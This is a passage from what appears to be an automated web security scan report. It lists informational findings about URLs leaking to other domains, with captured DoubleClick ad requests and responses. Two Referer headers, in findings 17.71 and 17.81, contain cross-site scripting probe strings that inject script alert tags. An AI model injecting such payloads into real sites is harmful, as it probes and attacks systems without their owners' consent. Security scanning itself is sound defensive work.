GET /adj/N6103.135388.BIZO/B5185769.6;sz=728x90;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/b%3B235300643%3B0-0%3B0%3B59317886%3B3454-728/90%3B40364845/40382632/1%3Bu%3D%2Cbzo-57200543_1296226807%2C11d765b6a10b1b3%2Csports%2Cbzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l%3B%7Esscs%3D%3f;ord=7630304?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 779
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:40:06 GMT
Expires: Fri, 28 Jan 2011 16:40:06 GMT
Connection: close

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/4/130/%2a/j;235207729;0-0;0;59034359;3454-728/90;40334076/40351863/1;u=,bzo-57200543_1296226807,11d765b6a10b1b3,sport
...[SNIP]...
57200543_1296226807%2C11d765b6a10b1b3%2Csports%2Cbzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l%3B%7Esscs%3D%3fhttp://www.supercutsfranchise.com"><img src="http://s0.2mdn.net/viewad/3050873/1-Chris_Accountant_728x90.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.71. http://ad.doubleclick.net/adj/N6103.135388.BIZO/B5185769.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6103.135388.BIZO/B5185769.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/N6103.135388.BIZO/B5185769.6;sz=728x90;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/b%3B235300643%3B0-0%3B0%3B59317886%3B3454-728/90%3B40364845/40382632/1%3Bu%3D%2Cbzo-57200543_1296226807%2C11d765b6a10b1b3%2Csports%2Cbzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l%3B~sscs%3D%3f;ord=7630304? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 15:00:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 773

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/4/12e/%2a/j;235207729;1-0;0;59034359;3454-728/90;40362690/40380477/1;u=,bzo-57200543_1296226807,11d765b6a10b1b3,sport
...[SNIP]...
o-57200543_1296226807%2C11d765b6a10b1b3%2Csports%2Cbzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l%3B~sscs%3D%3fhttp://www.supercutsfranchise.com"><img src="http://s0.2mdn.net/viewad/3050873/Jim_Pharmacist_728x90.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.72. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-15223392_1296252139,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=463717;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.47846851754002273? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:02:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1082

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/0/0/%2a/v;234604289;0-0;58;44779888;4307-300/250;40086868/40104655/1;u=,cm-15223392_1296252139,11d765b6a10b1b3,ent,cm
...[SNIP]...
cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;~aopt=2/0/ee/0;~sscs=%3fhttp://www.ntxhonda.com/"><img src="http://s0.2mdn.net/viewad/2980124/NTXH_ClickNGo_300X250_generic_Q1.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.73. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-51832465_1296253632,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=302941;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_l;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.9211412204895169? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:27:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3769

document.write('<iframe src=\"http://view.atdmt.com/CRS/iview/286443367/direct/01/902793?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/o%3B234029658%3B0-0%3B2%3B44779888%3B4307-300/250%3
...[SNIP]...
%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3fhttp://clk.redcated/CRS/go/286443367/direct/01/902793" target="_blank"><img src="http://view.atdmt.com/CRS/view/286443367/direct/01/902793"/></a>
...[SNIP]...

17.74. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-61892947_1296253385,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.weath_l-cm.sports_h-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=54892;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_l;btg=cm.weath_l;btg=cm.sports_h;btg=cm.ent_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.6713631898164749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:23:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3842

document.write('<iframe src=\"http://view.atdmt.com/AVE/iview/286764367/direct;wi.300;hi.250/01/655809?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/e%3B234367361%3B0-0%3B0%3B44779888%3B
...[SNIP]...
st7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_h%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3fhttp://clk.redcated/AVE/go/286764367/direct;wi.300;hi.250/01/655809" target="_blank"><img src="http://view.atdmt.com/AVE/view/286764367/direct;wi.300;hi.250/01/655809"/></a>
...[SNIP]...

17.75. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-79489099_1296252890,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=917199;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.6830512962769717? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:14:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3839

document.write('<iframe src=\"http://view.atdmt.com/AVE/iview/286764367/direct;wi.300;hi.250/01/161809?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/e%3B234367361%3B0-0%3B0%3B44779888%3B
...[SNIP]...
aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3fhttp://clk.redcated/AVE/go/286764367/direct;wi.300;hi.250/01/161809" target="_blank"><img src="http://view.atdmt.com/AVE/view/286764367/direct;wi.300;hi.250/01/161809"/></a>
...[SNIP]...

17.76. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-48597195_1296251864,11d765b6a10b1b3,Miscellaneous,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=199062;contx=Miscellaneous;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.3579352851957083? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 21:57:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3178

document.write('<iframe src=\"http://view.atdmt.com/AVE/iview/286764367/direct;wi.300;hi.250/01/7524026?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/e%3B234367361%3B0-0%3B0%3B44779888%3
...[SNIP]...
btg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3fhttp://clk.redcated/AVE/go/286764367/direct;wi.300;hi.250/01/7524026" target="_blank"><img src="http://view.atdmt.com/AVE/view/286764367/direct;wi.300;hi.250/01/7524026"/></a>
...[SNIP]...

17.77. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain (see the captured request and response below). When the browser fetches that resource or the user follows the link, the page URL, query string included, is sent to that domain in the Referer header.

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-85794731_1296251888,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=262895;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.33319127024151385? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 21:58:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4054

document.write('<iframe src=\"http://view.atdmt.com/CNT/iview/286211276/direct;wi.300;hi.250/01/7547542?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/p%3B234577320%3B0-0%3B0%3B44779888%3
...[SNIP]...
a1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3fhttp://clk.redcated/CNT/go/286211276/direct;wi.300;hi.250/01/7547542" target="_blank"><img src="http://view.atdmt.com/CNT/view/286211276/direct;wi.300;hi.250/01/7547542"/></a>
...[SNIP]...

17.78. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain (see the captured request and response below). When the browser fetches that resource or the user follows the link, the page URL, query string included, is sent to that domain in the Referer header.

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-83450342_1296254125,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=782666;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_l;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_m;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.1877197385765612? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:35:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3774

document.write('<iframe src=\"http://view.atdmt.com/CRS/iview/286443367/direct/01/1396325?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/o%3B234029658%3B0-0%3B2%3B44779888%3B4307-300/250%
...[SNIP]...
3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3fhttp://clk.redcated/CRS/go/286443367/direct/01/1396325" target="_blank"><img src="http://view.atdmt.com/CRS/view/286443367/direct/01/1396325"/></a>
...[SNIP]...

17.79. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/classified

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fbi.wrgb.cbs6albany/classified

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain (see the captured request and response below). When the browser fetches that resource or the user follows the link, the page URL, query string included, is sent to that domain in the Referer header.

Request

GET /adj/fbi.wrgb.cbs6albany/classified;s1=classified;pos=1;dcode=fbi;pcode=wrgb;kw=;ref=oodle.com;test=;fci=ad;dcopt=;tile=1;sz=728x90;ord=3232293233741075? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?taxonomy=classified&cname=section&shier=classified&ghier=classified&trackbyurl=wrgb&usetitle=true&domain=cbs6albany.oodle.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 14:27:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 312

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/c;234764637;0-0;0;36776316;3454-728/90;40474377/40492164/1;;~sscs=%3fhttp://mariacollege.edu/"><img src="http://s0.2mdn.net/viewad/2362004/Maria_728x90_AAD2-10_40K.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.80. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/entertainment

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fbi.wrgb.cbs6albany/entertainment

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain (see the captured request and response below). When the browser fetches that resource or the user follows the link, the page URL, query string included, is sent to that domain in the Referer header.

Request

GET /adj/fbi.wrgb.cbs6albany/entertainment;s1=entertainment;pos=1;dcode=fbi;pcode=wrgb;kw=;ref=cbs6albany.com;test=;fci=ad;dcopt=;tile=1;sz=728x90;ord=9968673593830318? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 01:54:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 312

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/m;234764637;0-0;0;36776750;3454-728/90;40474377/40492164/1;;~sscs=%3fhttp://mariacollege.edu/"><img src="http://s0.2mdn.net/viewad/2362004/Maria_728x90_AAD2-10_40K.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.81. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/entertainment/events

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fbi.wrgb.cbs6albany/entertainment/events

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain (see the captured request and response below). When the browser fetches that resource or the user follows the link, the page URL, query string included, is sent to that domain in the Referer header.

Request

GET /adj/fbi.wrgb.cbs6albany/entertainment/events;s1=entertainment;s2=events;pos=2;dcode=fbi;pcode=wrgb;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=2;sz=300x250;ord=6144302128814161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/albany-ny/events/performing+artsa1daa%253cscript%253ealert%25281%2529%253c%252fscript%253ef524f3c9c61
Accept: */*
